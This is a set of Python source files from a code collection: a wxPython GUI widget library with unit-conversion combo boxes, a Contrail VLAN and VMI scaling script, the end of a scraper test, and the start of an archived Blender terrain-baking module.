        # All sent items are now marked, so filtering on unsent rows yields nothing.
        unsent = self.session.query(JobDataDbModel).filter(
            JobDataDbModel.has_been_emailed == False).all()
        self.assertFalse(unsent)
        # Satisfied that it works as expected, Larry goes to bed.
# Allow running this test module directly: discover and run all TestCase classes above.
if __name__ == '__main__':
    unittest.main()
| ctiller15/Board-scrape-tool | tests/functional_tests.py | functional_tests.py | py | 5,831 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "sqlalchemy.ext.declarative.declarative_base",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "unittest.TestCase",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "src.get_html_script.scrape_site",
"line_number": 27,
"usage_type": "ca... |
75316088506 | import re
import wx
from wx import GridSizer
from wx.lib.agw.supertooltip import SuperToolTip
from boaui.units import area, charge, inertia, length, mass, pressure, volume, tnt, density, torque
from .label import SmartLabel
from . import LayoutDimensions, SmartToolTip
from ..units import KEY_IMPERIAL, KEY_METRIC
from ..units.acceleration import AccelerationUnit
from ..units.angle import AngleUnit
from ..units.area_density import AreaDensityUnit
from ..units.area import AreaUnit
from ..units.charge import ChargeUnit
from ..units.density import DensityUnit
from ..units.force import ForceUnit
from ..units.inertia import InertiaUnit
from ..units.length import LengthUnit
from ..units.linear_density import LinearDensityUnit
from ..units.linear_pressure import LinearPressureUnit
from ..units.mass import MassUnit
from ..units.pressure import PressureUnit
from ..units.time import TimeUnit
from ..units.tnt import TntUnit
from ..units.torque import TorqueUnit
from ..units.velocity import VelocityUnit
from ..units.volume import VolumeUnit
__author__ = 'Joeny'
class SmartTextBox(wx.TextCtrl):
    """
    A wx.TextCtrl with validation hooks, tooltips, enable/disable placeholder
    messages and colour-coded error feedback.

    The validation method goes through three process:
        1. OnChar(): Capture only the key characters that are necessary.
        2. wx.EVT_TEXT: Validate that the input is actually a number.
        3. Validate(): Check against the tolerance level.
    """
    def __init__(self, parent, key_up=None, message=None, enabled_message='',
                 disabled_messages=None, disabled_index=None, value=None, enable=None,
                 helptext=None, required=False,
                 normal=(255, 255, 255), format_error=(228, 115, 115), range_error=(244, 67, 54),
                 data=None, *args, **kwargs):
        """
        Constructor.

        :param parent: parent ui
        :param key_up: bind key up handler
        :param message: tooltip message
        :param enabled_message: value shown once the box is enabled
        :param disabled_messages: list of placeholder messages shown while disabled
        :param disabled_index: index of which message to display
        :param value: initial value for the box
        :param enable: initial enabled state (None leaves the default)
        :param helptext: context-help text
        :param required: whether a value is required for check_requirement()
        :param normal: background RGB for the normal state
        :param format_error: background RGB for format errors
        :param range_error: background RGB for range errors
        :param data: arbitrary payload that can be read back later
        """
        wx.TextCtrl.__init__(self, parent, *args, **kwargs)
        if value is not None:
            self.Value = str(value)
        # 'keys' may carry validation bounds under 'min'/'max'.
        self.keys = kwargs.get('keys', {})
        self.parent = parent
        self.data = data
        if key_up:
            self.Bind(wx.EVT_KEY_UP, key_up, self)
        self.tooltip = None
        if message:
            self.tooltip = wx.ToolTip(message)
            self.SetToolTip(self.tooltip)
        self.enabled_message = enabled_message
        self.disabled_messages = disabled_messages
        if disabled_index is None and self.disabled_messages:
            self.disabled_index = 0
        else:
            self.disabled_index = disabled_index
        if helptext:
            self.SetHelpText(helptext)
        self.required = required
        self.color_normal = normal
        self.color_format_error = format_error
        self.color_range_error = range_error
        if enable is not None:
            self.Enable(enable)

    def clear(self):
        """Clear the textbox contents."""
        self.Clear()

    @property
    def min(self):
        """Minimum allowed value, or None when unset."""
        return self.keys.get('min')

    @min.setter
    def min(self, value):
        self.keys['min'] = value

    @property
    def max(self):
        """Maximum allowed value, or None when unset."""
        return self.keys.get('max')

    @max.setter
    def max(self, value):
        self.keys['max'] = value

    def set_value(self, value, fmt=None):
        """
        Set the textbox value.

        :param value: value to display; None clears the box
        :param fmt: optional %-style format string applied to value
        """
        if value is not None:
            if fmt:
                self.Value = fmt % (value)
            else:
                self.Value = str(value)
        else:
            self.Value = ""

    def get_value(self, key=None):
        """
        Return the current text.  When *key* (a keycode captured during a key
        event) is given, return the text as it will read once that character
        is inserted at the caret position.
        """
        val = self.GetValue()
        if key is not None:
            # When key is struck we splice it in at the insertion point.
            digit = chr(key)
            pos = self.GetInsertionPoint()
            if pos == len(val):
                val += digit
            else:
                val = val[:pos] + digit + val[pos:]
        return val

    def Enable(self, *args, **kwargs):
        """Enable the control, clearing any disabled placeholder message."""
        wx.TextCtrl.Enable(self, *args, **kwargs)
        if self.disabled_messages:
            if self.Value in self.disabled_messages:
                self.Value = self.enabled_message

    def Disable(self, *args, **kwargs):
        """Disable the control, showing the disabled placeholder message."""
        wx.TextCtrl.Disable(self, *args, **kwargs)
        if self.disabled_messages:
            self.set_disable_message()

    def set_normal_color(self):
        """Restore the normal background colour."""
        self.SetBackgroundColour(self.color_normal)
        self.Refresh()

    def set_format_error_color(self):
        """Show the format-error background colour."""
        self.SetBackgroundColour(self.color_format_error)
        self.Refresh()

    def set_range_error_color(self):
        """Show the range-error background colour."""
        self.SetBackgroundColour(self.color_range_error)
        self.Refresh()

    def set_disable_message(self):
        """Display the configured disabled placeholder message."""
        self.Value = self.disabled_messages[self.disabled_index]

    def check_requirement(self):
        """
        Verify the requirement flag: a required, enabled box must hold a
        non-empty value.  Colours the box and returns False when the
        requirement is not met; otherwise restores the normal colour and
        returns True.  Non-required boxes always pass.
        """
        if self.required:
            if self.Enabled:
                # GetValue() returns a string and never None, so test for
                # emptiness (the previous 'is None' check could never fail a
                # blank box).  The hasattr() guards on our own methods were
                # always true and have been removed.
                if not self.get_value():
                    self.set_format_error_color()
                    return False
            self.set_normal_color()
        # If not required, return true.
        return True
class SmartComboBox(wx.ComboBox):
    """
    A wx.ComboBox with built-in unit-conversion support.

    Call one of the ``activate_*`` methods to populate the dropdown with a
    unit family (length, mass, pressure, ...).  ``convert`` then exposes the
    active unit's conversion-factor function.
    """

    def __init__(self, parent, data=None, style=wx.CB_READONLY, value='', message=None, unit=None, unit_system=None,
                 enabled_message='', disabled_messages=None, disabled_index=None, enable=None,
                 helptext=None, required=False, *args, **kwargs):
        """
        Constructor.

        :param parent: parent panel or frame
        :param data: initial list of string items
        :param style: combobox style (read-only by default)
        :param value: initially displayed value
        :param message: tooltip message
        :param unit: Unit object; when given, the box is activated immediately
        :param unit_system: 'imperial' or 'metric'
        :param enabled_message: message restored when the box is enabled
        :param disabled_messages: list of placeholder messages shown while disabled
        :param disabled_index: index of which disabled message to display
        :param enable: initial enabled state (None leaves the default)
        :param helptext: context-help text
        :param required: whether a value is required for check_requirement()
        """
        wx.ComboBox.__init__(self, parent, style=style, *args, **kwargs)
        self.convert = None
        self.unit_system = unit_system
        self.unit = unit
        if data:
            self.AppendItems(data)
        if value:
            self.Value = value
        self.tooltip = None
        if message:
            self.tooltip = wx.ToolTip(message)
            self.SetToolTip(self.tooltip)
        self.previous_index = 0
        self.enabled_message = enabled_message
        self.disabled_messages = disabled_messages
        if disabled_index is None and self.disabled_messages:
            self.disabled_index = 0
        else:
            self.disabled_index = disabled_index
        if unit:
            # A unit was supplied up front, so populate the dropdown now.
            self.activate()
        self.current_dropbox_selection = None
        self.Bind(wx.EVT_COMBOBOX_DROPDOWN, self.on_dropdown_open, self)
        if helptext:
            self.SetHelpText(helptext)
        self.required = required
        if enable is not None:
            self.Enable(enable)

    def bind_dropdown(self, handle):
        """Bind the selection-changed event to *handle*."""
        self.Bind(wx.EVT_COMBOBOX, handle)

    def Enable(self, *args, **kwargs):
        """Enable the control, removing any disabled placeholder entries."""
        wx.ComboBox.Enable(self, *args, **kwargs)
        if self.disabled_messages:
            if self.Value in self.disabled_messages:
                for index, label in enumerate(self.Strings):
                    if label in self.disabled_messages:
                        self.Delete(index)
                self.SetSelection(self.previous_index)

    def Disable(self, *args, **kwargs):
        """Disable the control, appending and selecting the placeholder entry."""
        wx.ComboBox.Disable(self, *args, **kwargs)
        if self.disabled_messages:
            self.previous_index = self.GetCurrentSelection()
            self.Append(self.disabled_messages[self.disabled_index])
            self.SetSelection(self.GetCount() - 1)

    def on_dropdown_open(self, event=None):
        """Record the current selection when the dropdown opens."""
        self.current_dropbox_selection = self.GetCurrentSelection()

    def is_selection_change(self):
        """
        Return True when the selection differs from the one recorded before
        the dropdown was opened.
        """
        # Compare by value: the previous identity ('is') comparison of ints
        # only worked via CPython's small-integer caching.
        return self.current_dropbox_selection != self.GetSelection()

    def append(self, label, obj):
        """
        Append an item with attached client data.

        :param label: title
        :param obj: object data
        """
        self.Append(label, obj)

    def set_selection_by_data(self, value):
        """Select the first item whose client data equals *value*."""
        for index, text in enumerate(self.Strings):
            if self.HasClientData():
                if self.GetClientData(index) == value:
                    self.SetSelection(index)
                    # Leave loop
                    return

    def get_data(self):
        """Return the client data of the current selection, or None."""
        if self.GetSelection() == -1:
            return None
        else:
            return self.GetClientData(self.GetSelection())

    def set_value(self, value):
        """Set the displayed value (stringified)."""
        self.Value = str(value)

    def get_value(self):
        """Return the displayed value."""
        return self.Value

    def activate(self):
        """Repopulate the dropdown from the current unit object."""
        self.Clear()
        self.AppendItems(self.unit.get_list())
        self.SetSelection(self.unit.get_default_selection())
        self.convert = self.unit.get_conversion_factor

    def _activate_unit(self, unit_cls, *args, **kwargs):
        """
        Shared implementation of every ``activate_*`` helper (the originals
        were 18 copy-pasted bodies): build the unit, apply any 'unit_list'
        override, propagate the unit system and populate the dropdown.
        """
        self.unit = unit_cls(*args, **kwargs)
        unit_list = kwargs.get('unit_list')
        if unit_list:
            self.unit.metric_list = unit_list['metric']
            self.unit.imperial_list = unit_list['imperial']
        self.unit.unit_system = self.unit_system
        self.activate()

    def activate_acceleration(self, *args, **kwargs):
        """Activate acceleration units."""
        self._activate_unit(AccelerationUnit, *args, **kwargs)

    def activate_angle(self, *args, **kwargs):
        """Activate angle units."""
        self._activate_unit(AngleUnit, *args, **kwargs)

    def activate_area_density(self, *args, **kwargs):
        """Activate area-density units."""
        self._activate_unit(AreaDensityUnit, *args, **kwargs)

    def activate_area(self, *args, **kwargs):
        """Activate area units."""
        self._activate_unit(AreaUnit, *args, **kwargs)

    def activate_charge(self, *args, **kwargs):
        """Activate charge-weight units."""
        self._activate_unit(ChargeUnit, *args, **kwargs)

    def activate_density(self, *args, **kwargs):
        """Activate density units."""
        self._activate_unit(DensityUnit, *args, **kwargs)

    def activate_force(self, *args, **kwargs):
        """Activate force units."""
        self._activate_unit(ForceUnit, *args, **kwargs)

    def activate_inertia(self, *args, **kwargs):
        """Activate inertia units."""
        self._activate_unit(InertiaUnit, *args, **kwargs)

    def activate_length(self, *args, **kwargs):
        """Activate length units."""
        self._activate_unit(LengthUnit, *args, **kwargs)

    def activate_linear_density(self, *args, **kwargs):
        """Activate linear-density units."""
        self._activate_unit(LinearDensityUnit, *args, **kwargs)

    def activate_linear_pressure(self, *args, **kwargs):
        """Activate linear-pressure units."""
        self._activate_unit(LinearPressureUnit, *args, **kwargs)

    def activate_mass(self, *args, **kwargs):
        """Activate mass units."""
        self._activate_unit(MassUnit, *args, **kwargs)

    def activate_pressure(self, *args, **kwargs):
        """Activate pressure units."""
        self._activate_unit(PressureUnit, *args, **kwargs)

    def activate_time(self, *args, **kwargs):
        """Activate time units."""
        self._activate_unit(TimeUnit, *args, **kwargs)

    def activate_tnt(self, *args, **kwargs):
        """Activate TNT-equivalence units."""
        self._activate_unit(TntUnit, *args, **kwargs)

    def activate_torque(self, *args, **kwargs):
        """Activate torque units."""
        self._activate_unit(TorqueUnit, *args, **kwargs)

    def activate_velocity(self, *args, **kwargs):
        """Activate velocity units."""
        self._activate_unit(VelocityUnit, *args, **kwargs)

    def activate_volume(self, *args, **kwargs):
        """Activate volume units."""
        self._activate_unit(VolumeUnit, *args, **kwargs)

    def get_factor(self, origin, destination):
        """
        Return the conversion factor between two units of the active family.

        :param origin: origin unit
        :param destination: destination unit
        """
        return self.convert(origin, destination)

    def check_requirement(self):
        """
        Verify the requirement flag: a required, enabled combobox must hold a
        non-empty value.  Disabled or non-required boxes always pass.
        """
        if self.required and self.Enabled:
            # Value is a string and never None, so test for emptiness (the
            # previous 'is None' check could never fail an empty box).
            return bool(self.get_value())
        return True
class SmartInputLayout(wx.BoxSizer):
"""
Create the horizontal layout of smart textbox.
/---------------- OVERALL WIDTH ----------------------/
| |
| |
******************************************************* ----/
* * * * * * * * |
******************************************************* |
* * * * * * * *
* * (1) * * (2) * * (3) * * OVERALL HEIGHT
* * * * * * * *
******************************************************* |
* * * * * * * * |
******************************************************* ----/
"""
MAKE_VERTICAL_STRETCHABLE = 1
def __init__(self, parent, max=None, min=None, layout=None, label=None, *args, **kwargs):
"""
Constructor.
:param parent:
:param width:
:param max: maximum value for the textbox
:param min: minimum value for the textbox
:param layout:
:param label: pass in wx.Label or SmartLabel
:param args:
:param kwargs:
"""
wx.BoxSizer.__init__(self, wx.VERTICAL)
self.components = []
self.parent = parent
self.hsizer = None
self._next_id = 0
self.INDEX_LABEL = None
self.INDEX_TEXTBOX = None
self.INDEX_POSTBOX = None
self.INDEX_COMBOBOX = None
self.INDEX_BUTTON = None
if layout:
self.layout = layout
else:
self.layout = LayoutDimensions()
self.layout.calculate()
# Add in the label.
if label:
self.label = label
elif kwargs.get('name'):
self.label = SmartLabel(self.parent, label=kwargs.get('name'))
else:
self.label = None
self.min = min
self.max = max
# Set minimum size.
size = self.GetSize()
size.Height = self.layout.overall_height
self.SetMinSize(size)
def rename(self, name=None):
"""
Rename
:param name:
:return:
"""
self.label = wx.StaticText(self.parent, label=name)
@property
def next_id(self):
"""
:return:
"""
nid = self._next_id
self._next_id += 1
return nid
@property
def label(self):
"""
:return:
"""
if self.INDEX_LABEL is None:
return None
return self.components[self.INDEX_LABEL]
@label.setter
def label(self, value):
"""
:param value:
:return:
"""
if value is None:
return
self.INDEX_LABEL = self.next_id
self.components.append(value)
@property
def textbox(self):
"""
:return:
"""
if self.INDEX_TEXTBOX is None:
return None
return self.components[self.INDEX_TEXTBOX]
@textbox.setter
def textbox(self, value):
"""
:param value:
:return:
"""
if value is None:
return
self.INDEX_TEXTBOX = self.next_id
self.components.append(value)
@property
def postbox(self):
"""
:return:
"""
if self.INDEX_POSTBOX is None:
return None
return self.components[self.INDEX_POSTBOX]
@postbox.setter
def postbox(self, value):
"""
:param value:
:return:
"""
if value is None:
return
self.INDEX_POSTBOX = self.next_id
self.components.append(value)
@property
def combobox(self):
"""
:return:
"""
if self.INDEX_COMBOBOX is None:
return None
return self.components[self.INDEX_COMBOBOX]
@combobox.setter
def combobox(self, value):
"""
:param value:
:return:
"""
if value is None:
return
self.INDEX_COMBOBOX = self.next_id
self.components.append(value)
def do_layout(self):
"""
Do Layout.
:return:
"""
# Start with the vertical margin.
self.AddSpacer(self.layout.top)
# Move from left to right.
self.hsizer = wx.BoxSizer(wx.HORIZONTAL)
# self.hsizer.SetMinSize(wx.Size(self.layout.overall_width, self.layout.height))
self.hsizer.AddSpacer(self.layout.left)
for id in range(0, len(self.components)):
"""
wx.BoxSizer.Add(window, proportion=0, flag=0, border=0, userData=None)
Append a child to the sizer
:param window: a window, a spacer or another sizer to be added to the sizer. Its initial size
(either set explicitly by the user or calculated internally) is interpreted as the minimal and
in many cases also the initial size.
:param proportion: (int) the parameter is used in wx.BoxSizer to indicate if a child of a sizer can
change its size in the main orientation of the wx.BoxSizer - where 0 stands for non changeable
and a value of more than zero is interpreted relative to the value of other children of the
same wx.BosSizer. For example, you might have a horizontal wx.BoxSizer with three children,
two of which are supposed to change their size with the sizer. Then the two stretchable
windows would get a value of 1 each to make item grow and shrink equally with the sizer's
horizontal dimension.
:param flag: (int): combinations of flags affecting sizer's behavior
:param border: (int): determines the border width, if the flag parameter is set to include any
border flag
:param userData: (object) allows an extra object to be attached to the sizer item, for use in
derived classes when sizing information
"""
self.components[id].SetMinSize(self.layout.get_size(id))
self.hsizer.AddSpacer(self.layout.interior)
self.hsizer.Add(self.components[id],
self.layout.stretch_factor[id],
wx.ALL | wx.EXPAND,
self.layout.border_width[id])
# Add blank space if no component exists.
for id_blank in range(id+1, len(self.layout.widths)):
self.hsizer.AddSpacer(self.layout.interior)
blank_label = wx.StaticText(self.parent, label="")
blank_label.SetMinSize(self.layout.get_size(id_blank))
self.hsizer.Add(blank_label,
self.layout.stretch_factor[id_blank],
wx.ALL | wx.EXPAND,
self.layout.border_width[id_blank])
self.hsizer.AddSpacer(self.layout.right)
self.Add(self.hsizer, 1, wx.EXPAND | wx.ALL, 0)
self.AddSpacer(self.layout.bottom)
def add(self, item, proportion=0, flag=0, border=0, userData=None):
"""
Appends a child item to the sizer.
:param item: The item can be one of three kind of objects:
* window: A wx.Window to be managed by the sizer. Its minimal size (either set explicitly by the user or
calculated internally when constructed with wx.DefaultSize) is interpreted as the minimal size to use
when laying out item in the sizer. This is particularly useful in connection with
wx.Window.SetSizeHints.
* sizer: The (child-)sizer to be added to the sizer. This allows placing a child sizer in a sizer and thus
to create hierarchies of sizers (for example a vertical box as the top sizer and several horizontal
boxes on the level beneath).
* size: A wx.Size or a 2-element sequence of integers that represents the width and height of a spacer to
be added to the sizer. Adding spacers to sizers gives more flexibility in the design of dialogs;
imagine for example a horizontal box with two buttons at the bottom of a dialog: you might want to
insert a space between the two buttons and make that space stretchable using the proportion value and
the result will be that the left button will be aligned with the left side of the dialog and the right
button with the right side - the space in between will shrink and grow with the dialog.
:param proportion: Although the meaning of this parameter is undefined in wx.Sizer, it is used in wx.BoxSizer
to indicate if a child of a sizer can change its size in the main orientation of the wx.BoxSizer - where 0
stands for not changeable and a value of more than zero is interpreted relative (a proportion of the total)
to the value of other children of the same wx.BoxSizer. For example, you might have a horizontal
wx.BoxSizer with three children, two of which are supposed to change their size with the sizer. Then the
two stretchable windows should each be given proportion value of 1 to make them grow and shrink equally
with the sizer's horizontal dimension. But if one of them had a proportion value of 2 then it would get a
double share of the space available after the fixed size items are positioned.
(type int)
:param flag: This parameter can be used to set a number of flags which can be combined using the binary OR
operator |. Two main behaviours are defined using these flags. One is the border around a window: the
border parameter determines the border width whereas the flags given here determine which side(s) of the
item that the border will be added. The other flags determine how the sizer item behaves when the space
allotted to the sizer changes, and is somewhat dependent on the specific kind of sizer used.
* wx.TOP
* wx.BOTTOM
* wx.LEFT
* wx.RIGHT
* wx.ALL
* wx.EXPAND
* wx.SHAPED
* wx.FIXED_MINSIZE
* wx.ALIGN_CENTER
* wx.ALIGN_LEFT
* wx.ALIGN_RIGHT
* wx.ALIGN_TOP
* wx.ALIGN_BOTTOM
* wx.ALIGN_CENTER_VERTICAL
* wx.ALIGN_CENTER_HORIZONTAL
(type int)
:param border: Determines the border width, if the flag parameter is set to include any border flag.
(type int)
:param userData: Allows an extra object to be attached to the sizer item, for use in derived classes when
sizing information is more complex than the proportion and flag will allow for.
(type=PyObject)
"""
self.Add(item, proportion, flag, border, userData)
def add_stretch_spacer(self, prop=1):
    """
    Add a stretchable spacer to the sizer.

    Thin wrapper around wx.Sizer.AddStretchSpacer.
    :param prop: proportion of the sizer's free space the spacer absorbs.
    :return: None
    """
    self.AddStretchSpacer(prop=prop)
def add_spacer(self, size):
    """
    Add a fixed spacer that is (size, size) pixels.

    Thin wrapper around wx.Sizer.AddSpacer.
    :param size: width and height of the spacer in pixels.
    :return: None
    """
    self.AddSpacer(size)
def fit(self, window):
    """
    Tell the sizer to resize the window to match the sizer's minimal size. This is commonly done in the constructor
    of the window itself in order to set its initial size to match the needs of the children as determined by the
    sizer. Returns the new size.
    For a top level window this is the total window size, not the client size.
    :param window: the window to resize.
    :return: the new size, as computed by wx.Sizer.Fit.
    """
    # Bug fix: the docstring promised the new size, but the result of
    # self.Fit() was previously discarded; propagate it to the caller.
    return self.Fit(window)
def enable(self):
    """
    Enable the input layout.

    Base implementation is a no-op; subclasses must override.
    """
    pass
def disable(self):
    """
    Disable the input layout.

    Base implementation is a no-op; subclasses must override.
    """
    pass
def validate(self):
    """
    Validate the layout's inputs.

    Base implementation is a no-op; subclasses must override.
    """
    pass
def check_requirement(self):
    """
    Check whether every child component satisfies its requirement.

    Components that do not expose a ``check_requirement`` attribute are
    skipped.  Every component is visited (no short-circuit), and the
    aggregate verdict is returned afterwards.

    :return: True when no component reported False, otherwise False.
    """
    satisfied = True
    for component in self.components:
        if not hasattr(component, 'check_requirement'):
            continue
        if component.check_requirement() is False:
            satisfied = False
    return satisfied
class SmartButton(wx.Button):
    """
    wx.Button convenience wrapper that wires up common options at construction.
    """

    def __init__(self, parent, label='', evt_button=None, message=None, enable=None, helptext=None, *args, **kwargs):
        """
        Create the button and apply the optional conveniences.

        :param parent: parent window.
        :param label: button label text.
        :param evt_button: optional EVT_BUTTON handler to bind.
        :param message: optional tooltip message.
        :param enable: optional explicit enabled state (True/False).
        :param helptext: optional context-help text.
        :param args: extra positional arguments forwarded to wx.Button.
        :param kwargs: extra keyword arguments forwarded to wx.Button.
        :return:
        """
        wx.Button.__init__(self, parent, label=label, *args, **kwargs)
        if evt_button:
            self.Bind(wx.EVT_BUTTON, evt_button)
        # Keep a reference to the tooltip so callers can inspect/replace it.
        self.tooltip = wx.ToolTip(message) if message else None
        if self.tooltip is not None:
            self.SetToolTip(self.tooltip)
        if helptext:
            self.SetHelpText(helptext)
        if enable is not None:
            self.Enable(enable)
class SmartCheckBox(wx.CheckBox):
    """
    **Smarter CheckBox**

    wx.CheckBox wrapper that wires up tooltip, click handler, help text and
    enabled state at construction time.
    """
    def __init__(self, parent, id=-1, label='', evt_click=None, message=None, enable=None, helptext=None,
                 *args, **kwargs):
        """
        Constructor.
        :param parent: parent window.
        :param id: window identifier (-1 for an auto-generated id).
        :param label: check box label text.
        :param evt_click: optional EVT_CHECKBOX handler to bind.
        :param message: optional tooltip message.
        :param enable: optional explicit enabled state (True/False).
        :param helptext: optional context-help text.
        :param args: extra positional arguments forwarded to wx.CheckBox.
        :param kwargs: extra keyword arguments forwarded to wx.CheckBox.
        :return:
        """
        wx.CheckBox.__init__(self, parent, id=id, label=label, *args, **kwargs)
        self.tooltip = None
        if message:
            self.tooltip = wx.ToolTip(message)
            self.SetToolTip(self.tooltip)
        if evt_click:
            self.Bind(wx.EVT_CHECKBOX, evt_click)
        if helptext:
            self.SetHelpText(helptext)
        if enable is not None:
            self.Enable(enable)

    def bind_click(self, handle):
        """
        Bind *handle* as the check box EVT_CHECKBOX handler.
        :param handle: callable taking the wx event.
        :return: None
        """
        self.Bind(wx.EVT_CHECKBOX, handle)

    def get_value(self):
        """
        Return the current checked state.
        :return: True when checked, False otherwise.
        """
        return self.Value

    def set_value(self, value):
        """
        Set the checked state.
        :param value: truthy to check, falsy to uncheck.
        """
        self.SetValue(value)
| JoenyBui/boa-gui | boaui/textbox/smart.py | smart.py | py | 36,235 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "wx.TextCtrl",
"line_number": 36,
"usage_type": "attribute"
},
{
"api_name": "wx.TextCtrl.__init__",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "wx.TextCtrl",
"line_number": 73,
"usage_type": "attribute"
},
{
"api_name": "wx.EVT_KEY_UP"... |
7918280184 | import os
import sys
import argparse
import netaddr
from netaddr import EUI
def _parse_args( args_str):
    """
    Parse this script's command line options from a whitespace-separated string.

    :param args_str: full argument string, e.g.
        "--tenant_id X --config_node_ip Y --start_mac M ...".
    :return: argparse.Namespace with the parsed options.
    """
    parser = argparse.ArgumentParser()
    # NOTE(review): parse_known_args() runs before any argument is declared,
    # so every token lands in remaining_argv and is actually parsed by the
    # final parse_args() call below.  It works, but the first call (and the
    # first `args` binding) is effectively a no-op.
    args, remaining_argv = parser.parse_known_args(args_str.split())
    parser.add_argument(
        "--username", nargs='?', default="admin",help="User name")
    parser.add_argument(
        "--password", nargs='?', default="contrail123",help="password")
    parser.add_argument(
        "--tenant_id", nargs='?', help="trnant id",required=True)
    parser.add_argument(
        "--config_node_port", help="config node port")
    parser.add_argument(
        "--config_node_ip", help="config node ip",required=True)
    parser.add_argument(
        "--physical_router_id", help="Physical router id")
    parser.add_argument(
        "--start_mac", help="Mac address of vcenter vm ",required=True)
    parser.add_argument(
        "--start_vn_name", help="Vn name to launch vmi",required=True)
    parser.add_argument(
        "--start_vlan", help="Initial vlan",required=True)
    parser.add_argument(
        "--number_of_vlan", help="number of vlans to be created",required=True)
    parser.add_argument(
        "--auth_url", nargs='?', default="check_string_for_empty",help="Auth Url",required=True)
    args = parser.parse_args(remaining_argv)
    return args
def get_mac_address_iter_obj(mac, start_range, end_range):
    """
    Return an iterator of zero-padded 12-digit upper-case hex MAC strings,
    covering mac+start_range .. mac+end_range inclusive.

    :param mac: base MAC as a hex string, e.g. "000029572113".
    :param start_range: first offset (string or int).
    :param end_range: last offset, inclusive (string or int).
    """
    base = int(mac, 16)
    offsets = range(int(start_range), int(end_range) + 1)
    return iter([format(base + offset, '012X') for offset in offsets])
def get_subnet_iter_obj(subnet='1.1.1.0/24'):
addr,prefix = subnet.split('/')
ad1,ad2,ad3,ad4 = addr.split('.')
return iter([ad1+'.'+str(int(ad2)+x)+'.'+str(int(ad3)+y)+'.'+ad4+'/'+prefix for x in range(1,250) for y in range(1,250)])
def get_subnet_iter_obj_for_static_route(subnet='1.1.1.0/24'):
    """
    Return an iterator of subnets derived from *subnet* by stepping its
    first octet by 1..249 (249 entries in total).

    :param subnet: base subnet in "a.b.c.d/prefix" form.
    """
    addr, prefix = subnet.split('/')
    first, second, third, fourth = addr.split('.')
    base = int(first)
    return iter(['{0}.{1}.{2}.{3}/{4}'.format(base + x, second, third, fourth, prefix)
                 for x in range(1, 250)])
def get_vn_name(base_vn_name, counter):
    """
    Build a virtual-network name by appending *counter* to the base name.

    :param base_vn_name: name prefix, e.g. "tor_vn_".
    :param counter: suffix (any value convertible with str()).
    """
    return '{0}{1}'.format(base_vn_name, counter)
def get_vlan_range(start_vlan, numbers):
    """
    Return VLAN ids start_vlan .. start_vlan+numbers (inclusive) as strings.

    Note the inclusive upper bound: the list holds numbers+1 entries, which
    matches the MAC offsets produced for the same run.

    :param start_vlan: first VLAN id (string or int).
    :param numbers: how many additional VLANs beyond the first.
    """
    first = int(start_vlan)
    last = first + int(numbers)
    return [str(vlan) for vlan in range(first, last + 1)]
def main(args_str = None):
    """
    Drive vmi.py once per VLAN, feeding each run a fresh MAC address,
    subnet and static-route subnet.

    :param args_str: optional pre-built argument string; when omitted the
        process arguments (sys.argv) are used.
    """
    # Bug fix: previously only the sys.argv branch assigned script_args, so
    # passing args_str explicitly raised NameError.  Normalise args_str
    # first, then parse it once.
    if not args_str:
        args_str = ' '.join(sys.argv[1:])
    script_args = _parse_args(args_str)
    start_vlan = script_args.start_vlan
    number_of_vlan = script_args.number_of_vlan
    vlans = get_vlan_range(start_vlan, number_of_vlan)
    mac = get_mac_address_iter_obj(script_args.start_mac, '0', number_of_vlan)
    subnet = get_subnet_iter_obj()
    static_route_subnet = get_subnet_iter_obj_for_static_route(subnet='2.0.1.0/24')
    for vlan in vlans:
        try:
            # Bug fix: iterator.next() is Python 2 only; the builtin next()
            # works on both Python 2 and Python 3.
            m_addr = next(mac)
            sub = next(subnet)
            static_route_sub = next(static_route_subnet)
        except StopIteration:
            return
        vn_name = get_vn_name(script_args.start_vn_name, vlan)
        os.system("python vmi.py --static_route_subnet %s\
                   --tenant_id %s\
                   --config_node_ip %s\
                   --vcenter_vm_mac %s\
                   --vn_name %s\
                   --subnet %s\
                   --auth_url %s"
                  % (static_route_sub,
                     script_args.tenant_id,
                     script_args.config_node_ip,
                     m_addr, vn_name, sub,
                     script_args.auth_url
                     )
                  )
#python vmi_scale.py --tenant_id 74ebcac4-21da-4fe3-8c7f-e84c9e0424ca --config_node_ip 192.168.192.60 --start_mac 000029572113 --start_vn_name tor_vn_ --start_vlan 6 --number_of_vlan 7 --auth_url http://10.204.217.144:5000/v2.0
if __name__ == "__main__":
main()
| sandip-d/scripts | vmi_scale.py | vmi_scale.py | py | 3,983 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 61,
"usage_type": "attribute"
},
{
"api_name": "os.system",
"line_number": 77,
"usage_type": "call"
}
] |
31267028151 | ## Archived on the 22/09/2021
## Original terrain.py lived at io_ogre/terrain.py
import bpy
def _get_proxy_decimate_mod( ob ):
proxy = None
for child in ob.children:
if child.subcollision and child.name.startswith('DECIMATED'):
for mod in child.modifiers:
if mod.type == 'DECIMATE':
return mod
def bake_terrain( ob, normalize=True ):
    """
    Sample the TERRAIN sub-collision child of *ob* into a height grid.

    :param ob: object whose collision_mode is 'TERRAIN'.
    :param normalize: when True, heights are rescaled into [0, 1].
    :return: dict with 'data' (list of rows of heights), 'min', 'max'
        and 'depth' (max - min).
    """
    assert ob.collision_mode == 'TERRAIN'
    terrain = None
    # Locate the hidden TERRAIN proxy child created by OgreCollisionOp.
    for child in ob.children:
        if child.subcollision and child.name.startswith('TERRAIN'):
            terrain = child
            break
    assert terrain
    # NOTE(review): to_mesh(scene, apply_modifiers, settings) is the pre-2.8
    # Blender API signature -- this archived module targets the old API.
    data = terrain.to_mesh(bpy.context.scene, True, "PREVIEW")
    raw = [ v.co.z for v in data.vertices ]
    Zmin = min( raw )
    Zmax = max( raw )
    depth = Zmax-Zmin
    # Scale factor mapping [Zmin, Zmax] onto [0, 1].
    m = 1.0 / depth
    rows = []
    i = 0
    for x in range( ob.collision_terrain_x_steps ):
        row = []
        for y in range( ob.collision_terrain_y_steps ):
            v = data.vertices[ i ]
            if normalize:
                z = (v.co.z - Zmin) * m
            else:
                z = v.co.z
            row.append( z )
            i += 1
        if x%2:
            row.reverse() # blender grid prim zig-zags
        rows.append( row )
